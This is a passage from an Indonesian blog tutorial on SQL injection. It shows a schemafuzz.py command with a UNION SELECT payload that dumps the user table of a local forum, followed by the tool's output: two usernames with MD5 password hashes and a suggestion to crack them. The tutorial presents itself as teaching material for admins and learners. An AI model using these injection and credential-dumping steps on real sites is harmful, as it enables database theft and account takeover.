    ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dump -D webthing -T wt_users -C name,password


    eing ing eng....

    jreennnng....keluar deh user ama passwordnya

    hasilnya dibawah ini


    [+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--

    [+] Evasion Used: "+" "--"

    [+] 02:08:47

    [+] Proxy Not Given

    [+] Gathering MySQL Server Configuration...

    Database: webthings

    User: testing@localhost

    Version: 5.0.51a

    [+] Dumping data from database "webthings" Table "wt_users"

    [+] Column(s) ['name', 'password']

    [+] Number of Rows: 2


    [0] admin:e00b29d5b34c3f78df09d45921c9ec47:

    [1] user:098f6bcd4621d373cade4e832627b4f6:


    [-] [02:08:48]

    [-] Total URL Requests 4

    [-] Done


    jangan lupa kita selalu mengecek schemafuzzlog.txt nya

    setelah itu tinggal kita meng crack passwordnya pake program

    gemana rekan2 gampang kan pake schemafuzz

    NB:

    Langkah diatas sangat mudah digunakan pada MySQL v5 kalau untuk MySQL versi 4 silakan menebak2 tabel ama kolomnya

    Ingat kita jgn terlalu dimanjakan dengan program yang siap pakai, sebab kita gak ngerti dasar-dasarnya, asal-usulnya...

    program tersebut hanya bertujuan untuk membantu kita apabila kita tidak menemukan sesuatu yang muncul dalam site target.

    PERHATIAN!!!! jangan merusak, jadikan tutorial ini sebagai pembelajaran bagi para admin maupun yang pengen belajar sql injection serta newbie seperti saya

    Tulisan ini silahkan di copas dengan menyertakan kredit pengarangnya.


    By : Jasakom

    Read rest of entry
     

    Information Technology & GadGet Copyright © 2009 Gadget Blog is Designed by Ipietoon Sponsored by Online Business Journal